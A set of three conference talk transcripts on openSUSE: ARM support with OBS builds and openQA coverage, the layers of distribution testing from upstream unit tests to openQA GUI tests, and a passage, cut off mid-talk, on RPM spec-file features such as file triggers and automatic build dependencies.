I'm Guillaume Gardet. I work for Arm as a partner engineer dedicated to SUSE and openSUSE. I will cover what has happened over roughly the last year on the openSUSE side for ARM. I will start with what openSUSE on ARM is, then give an overview of the openSUSE on ARM development workflow, and we will see what happened on the OBS side, on the openQA side, and specifically for Tumbleweed, Kubic, and Leap. A little word about the openSUSE wiki, and finally the to-do list. And we will have some time for questions at the end of the talk. So what is openSUSE on ARM? The short answer is obviously openSUSE running on ARM architectures. What does that mean? We support 32-bit ARM architectures — ARMv6 for Tumbleweed only, and ARMv7 on Tumbleweed and Leap — and also the 64-bit architecture (AArch64) on both Tumbleweed and Leap. ARM systems are very diverse. We cover very small embedded systems such as the Raspberry Pi, but we also have some very powerful server systems such as the ThunderX2 from Cavium, now Marvell. And there are some differences between those systems: in the embedded world we deal more with custom bootloaders, which is a bit painful sometimes, while on the server side we use UEFI, so we have a single image and you can run it on your server. Before talking about the openSUSE on ARM workflow, a little word about the openSUSE workflow on x86. For Tumbleweed, when you want to update some packages, you submit them to Factory. They are reviewed and tested, and once accepted into Factory they are pushed to openQA for further tests. If that's okay, the update is released to users on the download server as Tumbleweed. On the ARM side, we have the openSUSE Factory ARM project, which is simply a link to openSUSE Factory (x86). The same for Leap: we have a project link from openSUSE Leap 15.1 ARM to the x86 project, openSUSE Leap 15.1. So we reuse all the sources — it's really the same, no patches on top, updated in real time. When you have an update in x86 Factory, you get the update on the ARM side. And there is just a very small overlay to handle the snapshot version and the content of the ISO and FTP trees on the ARM side. Here you have a screenshot of the openSUSE Leap ARM project: you can see that we have only four packages for the overlay, and all the rest are inherited from the x86 project. So if you want to get an update on the ARM side, you have to push it on the x86 side, because we share the sources. The workflow is the following: you submit to Factory, as before; it's reviewed and tested a bit; then when it has reached Factory, it is inherited in Factory ARM and pushed to openQA for ARM. If all is OK, it is released as Tumbleweed ARM; if openQA is not OK, the update is blocked so that users are always fine. Now let's talk about OBS. In OBS, we got some servers to get more power to build packages for ARM — thanks to our sponsor Marvell, formerly Cavium, which donated ThunderX2 machines. That build power allowed us to remove the snapshotting between the x86 Factory project and the ARM project, so now the sources are updated in real time. Previously, we needed to block the updates because it was too fast and Tumbleweed ARM didn't have any time to rebuild and push to openQA; now it's OK. It also allows us to enable more ARM builds in devel projects, so that maintainers can see build failures on ARM earlier and fix them when they care. Here is a little word about how to enable ARM builds in your project — it can be your own project or a devel project.
It's the same process. You just go to the Repositories tab and then click on Add Repositories. Then on the second page, you just select the ARM distribution you want to build for — for example, openSUSE Leap 15.1 ARM or openSUSE Factory ARM. Previously it was openSUSE Leap 15.0 Ports, because ARM and PowerPC were part of the same OBS project. So maintainers, please enable it and catch build failures for ARM early — there's a small command-line sketch of this a bit further below. ARM containers are now published when ARM is released, not when x86 is released. It seems obvious, but it was not the case previously. Some ARM OBS workers have been updated to better fit the requirements of packages: in fact, we decreased the number of build workers but increased the CPUs and RAM available to each. On the openQA side — how many people know openQA here? Do you know how it works? Not so much. So, a little bit about how it works. You have one server, shared by all architectures, where you have a web interface and an API. This server holds all the files — ISOs, hard disk images, repositories to test — as well as the test suite information, and it controls the test runs and stores the test results. Connected to this server, you have a number of machines, which can be x86, PowerPC, ARM, whatever. On these machines you run virtual machines — here it's QEMU — and you run the tests inside them. For each test, you run some actions and check whether the result is as expected or not. If you want a very complex schematic, you can read this one — just go to open.qa or ask the openQA folks here. Just a very small example: this is the mediacheck test. It just boots the ISO, starts the 'check installation media' option, and makes sure no errors are found. You can see screenshots, and the screenshots are used to check whether the test is okay or not. On the ARM side, we only test ARMv8, the 64-bit flavour; currently we do not test ARMv6 or ARMv7. Last year we used a Seattle machine, which had 6 CPUs and 32 GB of RAM, and we only ran two workers on it. We did a few tests for Tumbleweed and Leap, but with two workers you are very limited if you don't want openQA runs to take too long. Then at the end of the year we got a new machine, a D05, which is very powerful: 64 CPUs, 128 GB of RAM, a big SATA disk. Initially we enabled 10 workers on it and now we are at 16 workers, so we added even more tests for Tumbleweed and Leap, and we now have very good openQA coverage on ARM. We test, for example, upgrades, Btrfs tools, virtualization, RAID, multipath, et cetera. Of course, we needed to update some tests for ARM, because sometimes only x86 is supported in a test, so you need to update it. We also benefit from non-ARM-specific updates, which of course include new tests being added. openQA now has a good developer mode, which allows you to stop the virtual machine, take a screenshot, save it, and so on. There is a good script to use when you make a pull request on GitHub to update tests or add new tests; with this script, you can run the tests on openqa.opensuse.org and show that they are okay. We added support for huge pages with the QEMU backend, and also for generic options to be passed to QEMU. A few numbers, from one or two weeks ago: on Tumbleweed we have 72 tests now, plus 69 tests for the kernel, and on Leap we have 59 tests. On Tumbleweed there are eight tests for Kubic/MicroOS; you don't have those on Leap, of course, because Kubic and MicroOS are Tumbleweed flavours. On the DVD, you have three more tests on the Tumbleweed side, because LXD is only available on the Tumbleweed DVD, so you can test it only on Tumbleweed.
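Stepping back to the OBS part for a moment: the repository setup described above can also be done from the command line with osc. A hedged sketch — the project name is an example, and the XML stanza is roughly what the web UI would add for you:

```sh
# Open the project meta in your editor...
osc meta prj -e home:example:myproject

# ...and add a repository stanza along these lines inside the <project> element:
#   <repository name="openSUSE_Factory_ARM">
#     <path project="openSUSE:Factory:ARM" repository="standard"/>
#     <arch>aarch64</arch>
#     <arch>armv7l</arch>
#   </repository>

# Then watch the ARM build results for the project.
osc results home:example:myproject
```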
And on the openQA side there are just two more tests added recently: openQA bootstrap and OpenSCAP. On the NET ISO, we have two more tests on the Tumbleweed side too, because we create a hard disk image with a released Tumbleweed and test the upgrade from that hard disk image to the snapshot under test. And we also have two test suites for JeOS. A few screenshots from two days ago: you can see that Tumbleweed ARM is not in bad shape. Leap 15.1 has been released, and it was in pretty good shape; the six failures on ARM are not all real failures — there are false positives and only one real bug. And on the JeOS images it's not so good, but it's nothing big: in fact, when you run a very long test run, a single test failure makes the whole thing red. Now let's talk about Tumbleweed. Tumbleweed is now officially supported and is no longer a best-effort port for ARM — I mean for AArch64; that's not the case for ARMv6 or ARMv7. Lots of packages have been fixed, at build time on OBS but also at run time via openQA, including the kernel, Firefox, Chromium, and more. We also added new packages or enabled builds for 64-bit ARM, including the LDC compiler, the Free Pascal compiler, and more. And we added some features to existing packages — for example in Mesa, where we enabled some ARM-specific options. On ARMv7, we enabled EFI/GRUB2 support for two more boards: the SABRE Lite and the Chromebook Snow. And some boards moved out of the Contrib project and are now in the upstream Factory ARM project, such as the UDOO Neo. Thanks to the always up-to-date kernel in Tumbleweed, we get all the improvements from the upstream kernel. AArch64 also supports Kubic since January this year; it is tested in openQA along with Tumbleweed. If you want more information on it, I added the link on the slide — just go to kubic.opensuse.org and you will find it. On Leap 15.1, just a little word about how it is built. Leap 15.1 inherits some packages from SLE 15 SP1 — core packages such as GCC and the kernel — and for the rest it inherits from Leap 15.0. If package maintainers want to, they can push updates from Tumbleweed; this is the case, for example, for Krita or Firefox. And we of course fixed some package build and runtime failures. As for Tumbleweed, we switched two boards from the ARMv7 family to EFI/GRUB2 boot — again, the SABRE Lite and the Chromebook Snow. Now there are ready-to-use images such as JeOS or Docker images, which was not the case before, and we release always up-to-date images from the Leap 15.1 project. Yep. A little word about the openSUSE wiki. The main page for ARM is Portal:ARM. On the wiki you can find updates, on Portal:ARM of course, but also on the hardware compatibility pages — we added some systems, for example the D05 and the Overdrive 1000. And there is an interesting page with tests on systems, the openSUSE supported ARM boards page, where you can find whether USB or video output is supported and working with Tumbleweed or Leap. So if you have a board, please add it, and if you want information, go to that page. So a lot has been done, but there is still a long to-do list. We should continue to improve the wiki with new and up-to-date information. We can improve on the OBS side: what we need to do is speed up the ARMv7 images, because this is currently a bottleneck for getting more Tumbleweed snapshots — I think we have about 100 ARMv7 images to build each time. And we should enable ARM builds in more devel projects so that maintainers can catch build failures and fix them early.
Otherwise you have to wait until updates reach Tumbleweed and someone notices the failure, and the fix takes much longer this way. We can improve on the openQA side: maybe add more tests for AArch64. Why not test ARMv7 images? openQA allows tests on real hardware, so why not test a Raspberry Pi 3, for example? We could increase the number of openQA workers to speed up tests, maybe. And we should continuously monitor build failures and test failures and fix them as soon as possible. And people, please report the bugs you have, because I often meet people who tell me: hey, I have this problem on this board. Okay — did you file a bug or something? Oh, no. So please do it. We need some help to test and get feedback on the systems people use. It could be a simple board on the embedded side or a big server — tell us what is okay and what is broken, and we may fix it. We can add new features such as Secure Boot, for example. And we need to improve the graphics stack on ARM. That includes PCI Express cards such as NVIDIA or AMD, but also GPUs integrated into the system-on-chip, such as NVIDIA, Adreno, or Mali. And stay tuned on Tumbleweed, because kernel 5.2 and Mesa 19.1 are coming rather soon, and they add upstream Mali GPU support. It's currently just initial support, so don't expect full OpenCL or Vulkan or whatever, but most of OpenGL ES 2.0 is supported. And please join us on IRC or on the mailing list, and have fun. Do you have any questions? Yep — can someone pass the microphone at the back, please? Hi. My question is, you said on ARMv7 we don't have openQA at the moment. Is this a problem of human resources to enable and look after it, or is it a problem of hardware? It's a problem of nobody having taken care of doing it. So we have two options: either add an ARMv7 board, such as an Arm development board, and run workers on it; or run workers on a 64-bit machine with QEMU and just specify that you want to use the 32-bit instruction set. But I think we will do it shortly. Hi. A question about testing — you mentioned the Raspberry Pi. So does it work? How does it work for openQA with actual hardware? Which part of the hardware? With actual hardware, not a virtual machine. You mean testing the real hardware inside openQA? You mentioned that in the last slide. It is already done in SUSE's openQA, so it works; you just need to add it to the openSUSE openQA. So it's just a matter of hardware — all the software is ready to support it. So does that mean it doesn't test any Raspberry Pi-specific hardware features? Or what kinds of things are tested on the Raspberry Pi? I'm not sure — you should ask the people who know what they test. But I think you just run the same tests as in QEMU, only on the Raspberry Pi. Thank you. Any more questions? Okay. Thanks.
This talk will give an overview of what has happened over roughly the last year for openSUSE on ARM: what the current status is and what is on the TODO list.
10.5446/54421 (DOI)
So, my presentation will be about openSUSE testing, and I'm trying to give an overview. So, for this, let me check one thing first — I have to test something. The scope should be to answer the question: how is software within the openSUSE ecosystem tested? What kinds of tests exist? Who is doing what? How is it done? And then I would like to come to some challenges at the end. I will try to use the illustration of the so-called test automation pyramid to guide us through this. We will go through it from the bottom to the top. It starts with upstream source repo tests — wherever all the software that we are talking about lives, this is where we start. Then we come to package and project tests; this means that for all the tens of thousands of packages that we have in the distributions, we can also conduct tests. Then system level tests — and this is where the pyramid gets narrower, so we can say that by definition we have fewer tests where we combine all of that, but they have a broader impact on the whole system, the whole operating system. And then there are acceptance tests. And on top of the automation pyramid — this being about automated tests — is where we reach this cloudy area of exploratory beta testing: something that by definition cannot run as automated tests. But let's start from the bottom, with the upstream source repo tests. This is, well, something that everyone should do, right? Everyone that is doing software. We have some source code repository, and there, what we commonly see — on GitHub, for example — are projects with these nice badges showing in green or red how the unit tests are running. Top right, that's a screenshot from Travis, where we see checks that we can conduct even on pull requests, before merging something. All these upstream source repo tests provide a baseline for all the downstream tests, all the tests that come later. This is where we start. Normally it's hard to cover distribution integration when we are talking about source code repos — on GitHub or other version control hosting we are not yet talking about a Linux distribution, mainly about how my software works in whatever environment I'm using for development. Now, who is doing that? Well, the upstream communities — that could be single persons, or bigger communities that have maybe selected some target operating system as their main target. It could also be SUSE or openSUSE developers who develop software at that stage. And how is it done? That's very much ecosystem dependent. For example, when your program is mainly in Python, you're using something like Python unittest or pytest; if it's in Ruby, there are certain frameworks that are, say, the state of the industry, which you select. And this mainly defines how you run these tests on that level. Well, why is this done? This is the way to get the fastest feedback, because we are talking about developers who run some code on their machine and then want to test: does it do what I want it to do? So it's something that should be available to developers with the fastest feedback possible, meaning not too many steps in between. It's independent of distribution — well, I would say kind of, because commonly you need to select some operating system on which you develop, and based on that, you're running certain tests.
For example, if I run openSUSE Leap 15.1, then I develop on that. The question is: does it still work on openSUSE Leap 42.3, which is still supported? That's a question that is yet to be answered, and probably not on that level. So, it can be simple — it could be just Python, pytest, and tox — or it can be more sophisticated. This is showing an example from the Travis test results of openQA itself, the openQA software, where we have some unit tests and some web-based UI tests — so we are checking the UI, which is mainly the web interface of openQA. For that, we are using containers and virtual machines, something which you might have heard about in other talks, and it's also used for automated administration. What you can see in the bottom left is that there are multiple checkmarks; each checkmark stands for a certain set of tests. There are unit tests, integration tests, and UI tests, but there are also jobs which, for example, publish the documentation that is generated from the source code repositories — something else you can use Travis or CI systems for. Okay. So, this is the level of source code repositories. The next level, when we are talking about openSUSE as a distribution, is where we come to the packages. That mainly means OBS, where we have packages that take the source code from the upstream source code repositories. I would call that the foundation of distribution building, because we want to have a package for everything that ends up in the distribution. Of course, there are also other possibilities: it doesn't necessarily have to be a standard RPM build where you end up with a binary package; it could also be a container itself, a Flatpak image, or just an archive of something which you don't even need to build further. Now, I would call the building process itself a test, and OBS makes that pretty easy. You build against multiple projects, against multiple products in various versions and also various architectures, and by that you're testing: can I build that package? It might fail because of missing dependencies — something which is not necessarily something you need to change in your own source code. It might also be that you're relying on certain features which are only available in certain versions of dependencies or base layers, which maybe are not provided on an older version, or maybe a more recent version already behaves differently. And if we are talking about packaging, then commonly this is done using RPM, based on spec files. In spec files there is a build rule, a rule for preparation, and also one rule you can use which is called %check. If you use that, you can run the tests that you maybe already ran on the source code repository level — you can also do that within OBS — and the advantage is that you do it for all the different combinations I mentioned earlier. Now, I would like to present one slightly alternative approach on top of that, which is what I would call the multibuild package self-test. The question is: what if the upstream tests are passing but your package is broken? Or — openQA has been mentioned multiple times in different talks already, and I will come to what it is — what if openQA system tests are too late or too broad, because all those other tests come later and it takes longer for us to get the information?
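Before getting to that alternative approach, here is a hedged illustration of the plain %check rule just mentioned: a spec file can simply re-run the upstream test suite inside the build environment. The build system and targets are generic examples, not tied to any particular package:

```
# excerpt from an example spec file
%build
make %{?_smp_mflags}

%check
# re-run the upstream test suite during the OBS build;
# a failure here fails the package build for that target
make check
```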
Now, as an example project for this multibuild self-test — which for now I will not show on OBS — what it does is use two files in an OBS package. You need these two files to define that, in addition to the build step, you want to run some tests in another environment — not the build environment, but a dedicated, independent environment where you can test: does my package actually install? Does it work if I call, as a very trivial example, my script with --help or something? There are two files. One is _multibuild, where you can define a variant, so next to the normal variant of your package you define a test variant. And then there is the spec file itself. There you can see 'Name:' and then the definitions — this is what you commonly do when you build a package. The special part is the block with the %if test condition, so let's talk about that block. What you do here is that, in the test environment, the test package requires the built package. By doing that, when you build this test package, you are trying to resolve all the dependencies — but now you are resolving the runtime dependencies you would need. If you only ran a test within the build environment, you would not check for the runtime dependencies, only for the build time dependencies. This single line can already show you what you might be missing regarding the runtime dependencies that you forgot to mention in the spec file. And the second part, further down — this is an example from a server application — is where you call the commands that would be installed by the package you are building. By doing that — of course within the limits of the environment; in the case of OBS, for example, there is no external network access — you can still run a localhost server and try to register against that server locally. That all happens within OBS. If you have seen OBS build results before, this looks the same, just with a second half to it. Normally you have a package — I assume many people have seen a view similar to this — you have multiple repositories, multiple variants for the different architectures, and you see that all the packages succeed to build. That means we have a package for all of these projects. However, the test package — the multibuild variant I showed you before — shows that there are some problems. For example, on Leap 42.3 it shows 'unresolvable'. What does that mean? It means that we could build the package — we could find all the dependencies needed to build it, which is why it succeeded to build — but afterwards, when checking for the runtime dependencies, we can see that Leap 42.3 doesn't offer all the dependencies we would need. This is why I have added another variant of the repository, the last line, where I'm adding an additional repository — saying, okay, if that dependency is not there, let's try to add another development project which should provide the dependent package. And then you see that it can install the package, but then it fails: in the later step, when I was trying to register against my own server, I can see, aha, this doesn't work — something about the versions of the dependencies is different now. Now, that adds quite some boilerplate code to the spec file.
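Roughly, the two files can look like the sketch below. All names, ports and commands are illustrative; real packages using this trick differ in the details, but the shape is always the same: _multibuild declares an extra flavor, and the spec branches on it so the test flavor pulls in the freshly built binary package and exercises it.

```
# _multibuild (next to the spec file):
#   <multibuild>
#     <flavor>test</flavor>
#   </multibuild>

# example.spec (excerpt):
%global flavor @BUILD_FLAVOR@%{nil}

%if "%{flavor}" == "test"
Name:           example-test
# resolve and install the just-built package, i.e. its *runtime* dependencies
BuildRequires:  example = %{version}
%else
Name:           example
%endif

%check
%if "%{flavor}" == "test"
# poke the installed binaries, e.g. a local client/server round trip
example --help
example-server --port 8080 &
example-client --register http://localhost:8080
%endif
```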
It's not actually nice or tidy, because it's kind of abusing this instrument to build packages for testing. The one suggestion I can give is to use a separate spec file, which you can also do: if you don't want to intermingle it all, you can have multiple spec files per package, so you would have a test package definition next to the build package definition. Now, we are still on this package and project level, and there's more on this level. There are repository install checks, which check whether the generated repositories are installable — more or less what I showed on the level of a single package before: does it all install? This is what is done, for example, when a new snapshot of Tumbleweed is created, same as for Leap: it is checked whether we can install the packages in there. There are review bots — the famous example is the legal bot, which checks whether the licences of all the source files are correct. There are further policy checks, for example regarding the inheritance of a package: is a Leap package coming from a SLE source or from a Factory source, so that we don't have dangling packages which are only in Leap but not in the other distributions? And there are development project tests: some of the bigger development projects already have more and finer tests — for example, KDE as well as GNOME run tests on the development project level, so we are not waiting until we try to create a Tumbleweed snapshot to find out whether the latest Git snapshot of KDE works. And there are the so-called staging projects: when you create a submit request to have something included, for example in Factory, the staging projects check multiple things on that level before a package is accepted further into the whole distribution. Okay. So who does that? I would say the maintainers of the packages or of the build projects. How? One way is just by building it — I would say that is a test in itself — plus using the %check rule as well as the multibuild package self-test approach I showed, OBS bots, but also CI systems and containers: for example, an additional Jenkins instance, a container registry, or other tools where we can just check out the latest state from some development project and feed that result back before creating a submission. And why? Well, integration is crucial, especially for distribution building, when we are talking about multiple versions, architectures and all those variants. The goal is to identify the impact of a package before accepting it into the whole system. Okay. And then we are on the next level: system level tests. System level test means that we can test the whole operating system end to end. This is testing the distribution as a whole. We can — or we should — rely here on all the pre-integration test results, so knowing what we tested before, we can ask: okay, what else could go wrong after I accept the package? Now, what is different on the level of the system? A good example is booting the system or conducting an installation. This is something which we cannot do when we are talking about a single package, but there are a lot of things which can go wrong: it could be GRUB, the kernel, some config files which rely on a different config format, and all those things.
And this, on that level, directly feeds into the product release decision process. When we are talking about something like the rolling release Tumbleweed, same as for Leap and, on a similar level, same for SLE, system tests are conducted and based on that a build or snapshot of Tumbleweed is accepted or is discarded. I would say the main workhorse here regarding the classical distribution is openQA. If you haven't seen it, this is one view of how it looks. What you see there is Tumbleweed being tested, and each of these numbers to the right is one single virtual or physical machine test that is conducted. You can see that there is one build for every snapshot of Tumbleweed, and based on the test results in there, this is feeding back into the decision: should we release that build of Tumbleweed or not? If you are interested, later I would be happy to give you an introduction into openQA. If you know it already, you might not know what has been included recently, so I would like to present some recent new features which can make life easier. There is an openQA bootstrap tool for easy installation. So if you think, yeah, openQA was already cool but I don't know how to install that thing, it's too complicated: there is something like a one-click solution now, so you can run that. And even that is not necessary to do if you want to try out openQA. It had already been mentioned today in the morning talk: you can run custom test code on production instances. Because we are relying on virtual machines or physical machines to conduct the tests, it's not necessary that tests or experiments you are trying out are accepted into the main branch before they can be executed. So there is a way to have just your own Git repository where you are trying out something, changing an existing test or adding a new test, and that can be conducted on a production instance. There is YAML-based declarative schedule support now. Previously, some of the schedule was definable only in the web UI by selecting some fields, which is really easy to do and it's also pretty obvious what is going on there. However, if you want to go a bit further, more professional, then it's good to have the schedule definition itself in a more defined, text-based format. So this is what has been done recently, based on the YAML text format. And also, there is a reworked interactive developer mode. If you know the older interactive mode, that one is way more stable now and it's really fun to work with. What you can do is: if you are running a test, you can interact with the VM while it is running. Of course, that can impact the test result; this is why the individual job is then not regarded anymore for test results. But you can actually interact with the machine, for debugging purposes, for example. Okay. So system level tests, who is doing that? This is where release management comes into play and also quality assurance. This is also where I am participating, as a QA employee, as a QA engineer. We focus on, or we start from, system level tests. So we don't start from the package level; we rely on what is done on the package level. Mainly, we try to look at the product as a whole. How is that done? Mainly using VMs, because VMs are easy to scale and they are really isolated and separated, but also using containers. And then there are also different benchmarks executed, as well as other testing frameworks, which are run within openQA but also in other contexts.
And why is this done? I would say, well, this is what the user cares about when we are talking about openSUSE as a distribution or as an operating system: you use the system. And this is also what openQA tries to do. It uses the system as a user would do. But we are not finished with openQA yet. There is the next level: GUI acceptance tests. This is, I would say, where openQA shines. What I was presenting before were system level tests, which do not necessarily have anything to do with the UI. When we are talking about GUI acceptance tests, this is: yeah, okay, it needs to look correct, right? And we want to look at applications; they need to look awesome, so we want to preserve that. And for that, we can use openQA. Which actually, I would say, is pretty fun to develop tests for, because you can take a look at the screen and do what you would also do as a user: click somewhere, and then you ask openQA to do that. And you have that running in a test. Now, finally, something visual. This is a video recording which is done automatically by openQA for every single job that it executes. And what you can see here is how openQA instructs the installer to install an operating system. And after the installation, it logs into the system and then clicks around, starts applications and tries them. What you can also see is that this is a bit faster than in real time. So, of course, when we are doing an installation, this is actually conducted in real time; it relies on the performance of the network, because we are really downloading and installing the packages as a user would do. It's only the playback here afterwards that is a bit faster. Okay, this is the full video recording. Later on, it will boot into the system and it will open Firefox, go to a web page and then open a mail client and all these things. I think we do not necessarily need to wait for the whole thing. However, what I would like to show is the booting process, because this is something which is also pretty hard for other test automation tools to automate. So, we are in the installer. We just stopped right before rebooting, collect some logs, then we boot. You saw KDE for a glimpse of a second. Then we log into a text terminal. We call zypper. We conduct some console-based tests. And then later on, after we did that, we log into the graphical session here. We disable the screen saver and we test something about the network and all different kinds of applications that we normally ship on the different distributions. We trigger them here, or at least try to poke them a little bit. We cannot have an in-depth test of all the applications and packages on that level, because that would mean we would need to run like 20,000 packages on every run, and that's a bit too much. So we are doing less than that. So, if you want to see the full video, I invite you over to openqa.opensuse.org, select any job and just enjoy the show there. Now, GUI acceptance tests: who does that? Again, I would say release management and quality assurance, when we take a look at the results and check: does it still render correctly? Otherwise the openQA tests would also fail. How? That is done using openQA, at least for the distribution experience itself. And why? Because, well, compared to system-level tests, this is what the desktop user cares about. There can be much more in-depth testing in the system-level area, but in the end, it matters how it looks.
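If you are curious what such a test looks like underneath: every openQA test is a small Perl module using the testapi. The following is only a rough sketch; the console name and the command are just examples and not taken from any real test module:

    use base 'basetest';
    use strict;
    use warnings;
    use testapi;

    sub run {
        # Switch to a text console; console names are defined by the test
        # distribution, 'root-console' is the one commonly used in the
        # openSUSE tests.
        select_console 'root-console';
        # Run a trivial console check and fail this module if it fails.
        assert_script_run 'zypper --version';
    }

    1;

Real GUI tests work the same way, just with screen matches (needles) and simulated keyboard and mouse input instead of console commands.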
Okay, but then there is the last level, which is this cloudy area of exploratory and beta testing. And this is, well, manual by definition, I would say, because this is everything that you cannot automate. And this catches what was missed by automation and provides feedback on where to extend tests. This section in particular is very much dependent on all of you, on everyone, because, well, we don't know what was missed. We are relying on feedback, and this is also where it can scale out beyond something which I mentioned before: openQA is mainly relying, due to scalability reasons, on virtual machines. If you want to go broader and further, then it's very much dependent on specific hardware, drivers and all these things. And that is really hard to automate, even though maybe not impossible. So this is what I would call exploratory and beta testing. How is that done? Well, mainly by using it. So, you know, when Ludwig Nussel is writing an announcement and saying, hey, there's a new version of Leap 15.1, please try it, then we are relying also on the feedback from there. So I hope you're also providing that feedback by creating proper bug reports, or at least asking on the mailing list: hey, do you also have that problem, or is that a known problem? Why? Well, no automation can be complete. Now, this brings me to the points to take away. Important for me is that testing is not a phase. Twenty years ago it was very traditional that you would have some development phase, some integration phase, some testing phase, and I would say that is hardly the case anymore. We within SUSE QA test on a periodic, regular basis. Everybody that builds packages is doing that all the time. You as users are doing the testing. So it happens all the time, and everyone is involved. It's also important to select the right tool for the purpose. I presented some tools; I don't have the answer for all cases, and it depends on the individual job which one fits in particular. Now, optionally, this is something for you to explore further on your own: you can click around, and I provide some links for all the individual steps, for one example project that you can follow along with, covering all the steps of the pyramid which I've shown with individual examples, pointing to GitHub, OBS and further. The challenges regarding testing: well, more tests are good, but how to know what is already tested, that is hard to know. If you have something tested on a package level, you should know about it on a system level, so that you know what you need to add or what not to repeat again. Some projects and packages are good at this, but it does not scale if everybody has to reinvent the same level of testing. And tests may fail in any step, but who can keep an overview? Speaking for myself as a QA engineer, it's hard to have an overview and really see what is tested where. I just know that it is, so I can trust that. With this, I'm at the end. Thank you. Okay. So, any question, correction, note? A single one for now, or meet me outside later? Hello. I have a question about package maintenance. For example, recently we got a new version of a certain package in Tumbleweed, but it cannot renew the SSL certificate anymore because of some segmentation fault. But as package maintainers, they may not test the package under certain conditions. So can openQA provide tests for some kinds of important packages, for servers?
Because some people, maybe like me, update the system every night without checking whether the packages still work, and then something happens. So, I'm not sure I got this right: is this about package dependencies, that you might need a certain version of something for it to work, and you want to test the combination of packages? Maybe. It's not clear why this package doesn't work anymore. But if the package doesn't work with others, or the new version itself has some problem, I think this package shouldn't be accepted. So in the end, what one is doing there is building kind of your own distribution, because you have your package which relies on certain versions. I would say normally you should rely on OBS to provide you that, maybe in a custom repository where you include all the other repositories. But then that can be tested. That could also be tested within openQA. Think about how you as a user would do that: you would add some repositories and then try if that works. We can instruct openQA, no problem, to do the same, by saying: just use the latest Tumbleweed snapshot plus this repo plus that repo and then see if something works, including upgrades. So yeah, this is possible with the right combination. So thank you all.
How is software within the openSUSE ecosystem tested? What kind of tests exist? Who is doing what? This talk will try to present an overview of how "testing" is done for software developed in the openSUSE ecosystem. The workflow of software contributions to the openSUSE distributions will be shown from testing perspective from upstream source code repos to feedback from users in the released products. Used tools will be mentioned, the testing approaches as well as the people involved. The relation to SLE testing will be described. As this "overview" will not be able to cover all approaches used by the community feedback by the audience in the Q&A part of the talk will be appreciated. Of course, openQA will be included but it is certainly not the only solution to be mentioned ;)
10.5446/54422 (DOI)
Okay, hello. Welcome to my talk. Great that some people, even more people actually, made it up here, even though the weather is great outside and there's beer somewhere. So we're talking about spec files and RPM. Who am I? I've been working for Red Hat for quite a while now; I started in 2006. After about one year, I started getting involved in yum, which is the updater, the predecessor of DNF. Basically, that's the equivalent to zypper. And after a year of optimizing it, I realized, well, I'm done here; if I want to do anything else, I need to go down one level. And so I got involved in RPM around 2008 and have stuck there for some reason. This is actually my second visit to the openSUSE Conference. I've been here before, but a lot of things have changed. The last time I was here was 2009, and those were very different times. And I've actually not really been at the conference: we were hiding in some rooms and having technical talks about how to merge the different patches that were in the openSUSE and in the Fedora tree at that point. So where are we, RPM-wise? We've done a few large changes and features, but it's been a while now, it's like two, two and a half years since we rolled them out. File triggers and boolean dependencies were some of the biggest; especially file triggers are, at least in Fedora, a big thing, because they've basically changed most of the scriptlets. So there's a huge amount of packages that have been changed. I've actually not looked into openSUSE, what the state of adoption is there, but maybe someone can enlighten us on this. So we currently have a huge backlog of mostly smaller features that we are going to release. The idea is to have an alpha release out next week, hopefully. So over the next Fedora cycle, we want to get the release stabilized and then out. Traditionally, we in RPM use Fedora as our test bench: we basically put in an early version of the next release and then stabilize it throughout that. And the thing is, we've been pretty busy with this release thing on the side. So basically, after that's done, we are now thinking about what the next big thing is, what to do, where to go from here, and what is the most important thing to consider now. And the problem with RPM development is always that the RPM developers are developers and they are not really packagers. Yeah, we do have a few packages that we have to take care of, but that's just a side thing. And this has led, over basically the last decade, to most changes, even if they have a huge impact on packaging, like the file triggers, being done from an RPM perspective and not from an rpmbuild perspective. So it's like: how do we want to have this installed on the system properly? Not so much: what's the easiest way for the packager to actually put it into something. So that's basically something we want to do next: to look into spec files and packaging from a proper packager perspective, see what can be improved and what can be made easier. Another thing that's probably not that interesting for you, but I had the data lying around: that's the growth of Fedora. I always assumed that the data for openSUSE looks basically the same. The exact numbers are not that important. It starts here with 2004 and goes to basically now. And as you can see, it's basically a linear growth in the number of packages and also in the overall size of the distribution.
That means the number of work that has to be done, each release gets bigger and bigger and bigger and bigger every time. And there's no sign of just slowing down or stopping at any point. So the only way around this is either to get more and more and more people involved, which is surely an option, but there's only so much you can do there. And the other option is to basically lower the amount of work needed for each update to be able to keep up with that. That's basically all what I said about this. So the question is, what can be removed from the package or what steps can be removed from actually doing updates or creating new packages? What can be automated and what can we remove from the manual work that's needed? So one big area has been Scriptlets. That's kind of solved from an implementation point of view with file triggers. I don't know how far this works in OpenSUSE. Anyone have an idea? Is this used? Are they used on a broader scale? I think that's only one use for something like one. So that's something worth looking into, basically replacing all the Scriptlets in most packages and centralize them. For those who don't know, the file triggers are basically you can run a script based on a file name that's in another package. I don't know. It's possible that Sousa doesn't run that many Scriptlets as we do, but that's not what I heard. Ah, there's an expert. So the idea is basically to do all the Scriptlets in a centralized work and move them out of the packages so the packages get simpler and the packages themselves don't have to care about it, but one central instance does all the work centrally. The next big thing that's going to be the next release is automatic build dependencies that comes from Rust and Go folks. The problem here is that when many of those new languages do have their own package format and they do have all those mid-up data already, like dependencies on what other packages they depend, then it's a pain to synchronize that right now. So there are tools that can read some other Rust or Go package description and turn it into a spec file, but that's not, that's great as a starting point, but it's not something that's very helpful for distribution that does updates because you don't want to overwrite your spec file, you want to keep that and want to keep your history and your patches and everything. You don't want to copy over stuff that gets generated elsewhere all the time. The automatic build dependencies will solve this to some extent. It's basically a build script that's just run after prep and will generate dependencies for the build. It's going to be interesting for the OBS people that probably still sit down there not suspecting anything as it breaks a lot of assumptions of the build, which we have. Right now the assumption is you can just build a source RPM without anything, basically with RPM only, and you can then start a build with the dependencies in there and being guaranteed that it's going to succeed if you have all the dependencies installed. It's going to break, but it's not as bad as I first thought, so you basically have to do another round, read in the new dependencies and restart the build. It's going to be okay. I promise. Maybe. So another thing that's kind of RPM-ish, but not really, that's probably more Fedora-specific and we have to see how to translate to other distributions is I want to get some stuff out of the spec file and using the Git repositories we have the spec files in as data store. I'll elaborate on that. 
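Since file triggers came up: just to give a rough idea of the mechanism, a centralized scriptlet of that kind looks roughly like this in a spec file. The directory and the command here are only an illustration, not taken from any particular package:

    # Run once at the end of a transaction whenever other packages
    # installed files under /usr/share/fonts (hypothetical example).
    %transfiletriggerin -- /usr/share/fonts
    /usr/bin/fc-cache -f || :

So one package, say a font tooling package, carries that trigger once, and all the individual font packages can drop their own scriptlets entirely. But back to the spec files and the Git repositories.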
